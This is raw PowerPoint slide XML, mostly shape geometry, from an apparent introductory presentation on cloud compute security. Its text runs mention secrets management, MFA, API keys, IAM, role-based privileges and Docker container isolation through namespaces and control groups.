              <a:ext cx="4319270" cy="562610"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="562610">
                  <a:moveTo>
                    <a:pt x="93725" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4225290" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4261794" y="7358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4291583" y="27431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4311657" y="57221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="93725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="562355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="562355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="93725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7358" y="57221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27431" y="27431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57221" y="7358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93725" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0466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911857" y="2824734"/>
              <a:ext cx="12544425" cy="1865630"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1865629">
                  <a:moveTo>
                    <a:pt x="12390755" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="153289" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104818" y="7809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62736" y="29561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29561" y="62736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7809" y="104818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="153288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1712087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7809" y="1760557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29561" y="1802639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62736" y="1835814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104818" y="1857566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153289" y="1865376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12390755" y="1865376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12439225" y="1857566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12481307" y="1835814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12514482" y="1802639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536234" y="1760557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1712087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="153288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536234" y="104818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12514482" y="62736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12481307" y="29561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12439225" y="7809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123907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911857" y="2824734"/>
              <a:ext cx="12544425" cy="1865630"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1865629">
                  <a:moveTo>
                    <a:pt x="0" y="153288"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7809" y="104818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29561" y="62736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62736" y="29561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104818" y="7809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153289" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12390755" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12439225" y="7809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12481307" y="29561"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12514482" y="62736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536234" y="104818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="153288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1712087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536234" y="1760557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12514482" y="1802639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12481307" y="1835814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12439225" y="1857566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12390755" y="1865376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153289" y="1865376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104818" y="1857566"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="62736" y="1835814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29561" y="1802639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7809" y="1760557"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1712087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="153288"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0466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028443" y="2403348"/>
              <a:ext cx="4213860" cy="431800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4213860" h="431800">
                  <a:moveTo>
                    <a:pt x="0" y="431291"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4213859" y="431291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4213859" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="431291"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="04668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1960245" y="5189601"/>
            <a:ext cx="12446000" cy="2401570"/>
            <a:chOff x="1960245" y="5189601"/>
            <a:chExt cx="12446000" cy="2401570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1981962" y="5199126"/>
              <a:ext cx="4261485" cy="623570"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4261485" h="623570">
                  <a:moveTo>
                    <a:pt x="4157217" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="103886" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63436" y="8159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30416" y="30416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8159" y="63436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="103886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="623315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4261104" y="623315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4261104" y="103886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4252944" y="63436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4230687" y="30416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4197667" y="8159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4157217" y="0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981962" y="5199126"/>
              <a:ext cx="4261485" cy="623570"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4261485" h="623570">
                  <a:moveTo>
                    <a:pt x="103886" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4157217" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4197667" y="8159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4230687" y="30416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4252944" y="63436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4261104" y="103886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4261104" y="623315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="623315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="103886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8159" y="63436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30416" y="30416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63436" y="8159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103886" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0466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969770" y="5666994"/>
              <a:ext cx="12426950" cy="1914525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12426950" h="1914525">
                  <a:moveTo>
                    <a:pt x="12269470" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="157225" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107517" y="8012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64355" y="30325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30325" y="64355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8012" y="107517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="157225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1756917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8012" y="1806626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30325" y="1849788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64355" y="1883818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107517" y="1906131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157225" y="1914143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12269470" y="1914143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12319178" y="1906131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12362340" y="1883818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12396370" y="1849788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12418683" y="1806626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12426695" y="1756917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12426695" y="157225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12418683" y="107517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12396370" y="64355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12362340" y="30325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12319178" y="8012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122694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969770" y="5666994"/>
              <a:ext cx="12426950" cy="1914525"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12426950" h="1914525">
                  <a:moveTo>
                    <a:pt x="0" y="157225"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8012" y="107517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30325" y="64355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64355" y="30325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107517" y="8012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157225" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12269470" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12319178" y="8012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12362340" y="30325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12396370" y="64355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12418683" y="107517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12426695" y="157225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12426695" y="1756917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12418683" y="1806626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12396370" y="1849788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12362340" y="1883818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12319178" y="1906131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12269470" y="1914143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157225" y="1914143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107517" y="1906131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="64355" y="1883818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30325" y="1849788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8012" y="1806626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1756917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="157225"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="04668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2165730" y="5234432"/>
            <a:ext cx="4968875" cy="20872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Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Management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5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blocks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ot</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-14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account.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132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dirty="0" sz="2200" spc="-13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uses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MFA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privileged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accounts.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132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pro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ct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by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API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ke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ys.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33206" y="2239543"/>
            <a:ext cx="12046585" cy="2064385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="194310" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="86360">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1530"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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security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IAM</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="429259" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1430"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="429259" algn="l"/>
                <a:tab pos="429895" algn="l"/>
              </a:tabLst>
            </a:pP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Application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security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cloud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refers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both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software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development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IAM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features.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="429259" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2625"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="429259" algn="l"/>
                <a:tab pos="429895" algn="l"/>
              </a:tabLst>
            </a:pP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Cloud-based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IAM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enables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creation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account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user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security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groups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role-based </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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management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privileges.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82715" y="306451"/>
            <a:ext cx="42894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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Compute</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security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6276" y="760476"/>
            <a:ext cx="5759196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048636" y="4615053"/>
            <a:ext cx="4339590" cy="615315"/>
            <a:chOff x="2048636" y="4615053"/>
            <a:chExt cx="4339590" cy="615315"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2058161" y="4624578"/>
              <a:ext cx="4320540" cy="596265"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4320540" h="596264">
                  <a:moveTo>
                    <a:pt x="4221226" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="99313" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60650" y="7802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29082" y="29083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7802" y="60650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="99313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="595884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="595884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="99313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312737" y="60650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4291457" y="29083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4259889" y="7802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4221226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058161" y="4624578"/>
              <a:ext cx="4320540" cy="596265"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4320540" h="596264">
                  <a:moveTo>
                    <a:pt x="99313" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4221226" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4259889" y="7802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4291457" y="29083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4312737" y="60650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="99313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="595884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="595884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="99313"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7802" y="60650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29082" y="29083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60650" y="7802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99313" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19049">
              <a:solidFill>
                <a:srgbClr val="D5685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2242566" y="4659884"/>
            <a:ext cx="24199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Container</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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Sec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rity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037969" y="5084445"/>
            <a:ext cx="12561570" cy="2132965"/>
            <a:chOff x="2037969" y="5084445"/>
            <a:chExt cx="12561570" cy="2132965"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2047494" y="5093970"/>
              <a:ext cx="12542520" cy="2113915"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12542519" h="2113915">
                  <a:moveTo>
                    <a:pt x="12368911" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="173608" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127455" y="6201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85983" y="23701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50847" y="50847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23701" y="85983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6201" y="127455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="173608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1940178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6201" y="1986332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23701" y="2027804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50847" y="2062940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85983" y="2090086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127455" y="2107586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173608" y="2113787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12368911" y="2113787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12415064" y="2107586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12456536" y="2090086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12491672" y="2062940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518818" y="2027804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536318" y="1986332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12542519" y="1940178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12542519" y="173608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536318" y="127455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518818" y="85983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12491672" y="50847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12456536" y="23701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12415064" y="6201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123689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047494" y="5093970"/>
              <a:ext cx="12542520" cy="2113915"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12542519" h="2113915">
                  <a:moveTo>
                    <a:pt x="0" y="173608"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6201" y="127455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23701" y="85983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50847" y="50847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85983" y="23701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127455" y="6201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173608" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12368911" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12415064" y="6201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12456536" y="23701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12491672" y="50847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518818" y="85983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536318" y="127455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12542519" y="173608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12542519" y="1940178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12536318" y="1986332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12518818" y="2027804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12491672" y="2062940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12456536" y="2090086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12415064" y="2107586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12368911" y="2113787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173608" y="2113787"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127455" y="2107586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85983" y="2090086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50847" y="2062940"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23701" y="2027804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6201" y="1986332"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1940178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="173608"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="D5685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2415285" y="5453253"/>
            <a:ext cx="11349355" cy="1366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uses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many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shared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components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underlying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platform.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262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container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engine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such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as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Docker,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each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container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isolated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from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others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through</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15"/>
              </a:spcBef>
            </a:pP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separat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na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m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espace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contr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grou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p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s.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13661" y="1882292"/>
            <a:ext cx="13034010" cy="18224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14999"/>
